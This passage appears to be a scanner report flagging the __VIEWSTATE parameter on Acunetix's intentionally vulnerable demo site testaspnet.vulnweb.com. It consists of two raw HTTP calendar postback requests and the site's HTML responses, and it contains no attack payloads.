href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:White" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8128&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAdOUEFdoIZGRkSMCWdUaDeRn%2BSBiIVgoZM4Gm2Hk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL9xJG4AgKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDO1oW4aftaz9ZdiIZVBTqN1TC%2By8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:30 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAdOUEFdoIZGRkSMCWdUaDeRn+SBiIVgoZM4Gm2Hk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL9xJG4AgKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDO1oW4aftaz9ZdiIZVBTqN1TC+y8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:White" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8132&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAG48pGNoIZGRk4E3mFhOhxAQfIOAXbODkKN9fXZk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL3zoDWBgKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDEjf99NDBKNDolMZYcHlCJ8wOmek
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:51 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAG48pGNoIZGRk4E3mFhOhxAQfIOAXbODkKN9fXZk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL3zoDWBgKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDEjf99NDBKNDolMZYcHlCJ8wOmek" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 